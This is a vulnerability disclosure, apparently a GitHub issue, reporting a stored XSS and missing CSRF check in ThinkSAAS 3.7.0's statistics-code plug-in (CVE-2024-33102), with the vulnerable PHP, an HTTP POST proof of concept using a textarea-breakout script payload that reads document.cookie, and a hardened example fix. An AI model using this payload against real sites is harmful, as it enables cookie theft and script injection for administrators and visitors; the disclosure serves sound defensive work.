Hebing123 / cve


ThinkSAAS 3.7.0 has a stored XSS vulnerability #34

Open Hebing123 opened 5 months ago

Hebing123 commented 5 months ago

Summary

There is a stored XSS vulnerability in ThinkSAAS 3.7.0. The vulnerability occurs in the "back-end plug-in management - statistics code plug-in", where modifying the statistics code does not require CSRF validation, so an attacker can construct a form that induces an administrator to submit the statistics code. The code written by plugins/edit/pubs/counter.php is not strictly filtered, so every time an administrator accesses index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html, which directly references the variable {$code}, triggers a stored XSS vulnerability. If the statistics code plug-in is turned on, then all users accessing the website will trigger the stored XSS vulnerability on any page, because, according to the plugins/pubs/counter/counter.php logic, {$code} is inserted into all pages.

Details

<?php
defined('IN_TS') or die('Access Denied.');

// Plug-in edit
switch($ts){
    case "set":

        $strAbout = fileRead('plugins/pubs/counter/about.php');

        // Load the stored statistics code from the data file, falling back to the cache
        $code = fileRead('data/plugins_pubs_counter.php');
        if($code==''){
            $code = $tsMySqlCache->get('plugins_pubs_counter');
        }
        $code = stripslashes($code);

        // edit_set.html outputs {$code} unescaped inside the <textarea>
        include template('edit_set','counter');
        break;

    case "do":
        // No CSRF token is checked here, and tsTrim() does not remove a </textarea> tag from the input
        $code = tsTrim($_POST['code']);

        // The unfiltered value is persisted to file and cache, then re-rendered on every "set" request
        fileWrite('plugins_pubs_counter.php','data',$code);
        $tsMySqlCache->set('plugins_pubs_counter',$code);

        header('Location: '.SITE_URL.'index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set');
        break;
}

As shown above, plugins/pubs/counter/edit.php does not filter the </textarea> tag out of the modified statistics code, so when edit_set.html subsequently renders {$code}, the </textarea> closes the <textarea> tag and causes the $code content that should be inside the textarea to end up outside it.

Proof of Concept (POC)

POST /index.php?ac=plugin&app=pubs&in=edit&plugin=counter&ts=do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7i6edin000gfa5r6s1aje15noc; ts_email=admin%40admin.com; ts_autologin=rufq90izjw0s8kko8gkgk8gkg0s80g8
Content-Length: 58
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: your-ip
Connection: Keep-alive

code=</textarea><ScRiPt%20>alert(document.cookie)</ScRiPt>

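The two weaknesses the report describes, the unescaped {$code} inside the textarea and the missing CSRF check on the "do" branch, map to two standard fixes: HTML-encode the stored value at the point it is placed inside the <textarea>, and require a per-session token before accepting the write. The following is an added example written for this page, not ThinkSAAS code; the function names, the `counter_csrf` session key and the `$store` callback are assumptions made for illustration.

```php
<?php
// Added example (not ThinkSAAS code): hardened versions of the counter
// plug-in's "set" (render) and "do" (save) behaviour. Names are assumptions.
declare(strict_types=1);

// Output-encode the stored statistics code before placing it in <textarea>.
// htmlspecialchars turns "</textarea>" into "&lt;/textarea&gt;", so the
// parser cannot see a closing tag and the value stays inside the control;
// the administrator still sees the literal text, because <textarea> content
// is decoded for display.
function renderCounterTextarea(string $code): string
{
    $safe = htmlspecialchars($code, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<textarea name="code">' . $safe . '</textarea>';
}

// Issue (or reuse) a random per-session CSRF token for the edit form.
function csrfToken(array &$session): string
{
    if (empty($session['counter_csrf'])) {
        $session['counter_csrf'] = bin2hex(random_bytes(32));
    }
    return $session['counter_csrf'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrfValid(array $session, ?string $submitted): bool
{
    return isset($session['counter_csrf'])
        && is_string($submitted)
        && hash_equals($session['counter_csrf'], $submitted);
}

// Hardened "do" branch: refuse to persist anything unless the token matches.
// $store stands in for fileWrite()/cache->set() in the real plug-in.
function handleCounterSave(array $session, array $post, callable $store): bool
{
    if (!csrfValid($session, $post['csrf'] ?? null)) {
        return false; // forged cross-site form: nothing is written
    }
    $store(trim($post['code'] ?? ''));
    return true;
}

// Self-check with a constructed payload shaped like the one in this report.
function selfTest(): bool
{
    $payload = '</textarea><script>alert(1)</script>';
    $html = renderCounterTextarea($payload);
    $noBreakout = strpos($html, '</textarea><script>') === false
        && substr_count($html, '</textarea>') === 1;

    $session = [];
    $token = csrfToken($session);
    $written = null;
    $store = function (string $code) use (&$written): void { $written = $code; };
    $rejected = handleCounterSave($session, ['code' => 'x'], $store) === false
        && $written === null;
    $accepted = handleCounterSave($session, ['code' => 'x', 'csrf' => $token], $store) === true
        && $written === 'x';

    return $noBreakout && $rejected && $accepted;
}

echo selfTest() ? "ok\n" : "FAIL\n";
```

Run it with `php example.php`. Note that encoding only protects the edit page: the statistics code is by design raw HTML/JS that counter.php injects into every page, so the CSRF token is what keeps an untrusted party from planting it there, and the setting should remain restricted to administrators.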

Hebing123 commented 4 months ago

CVE-2024-33102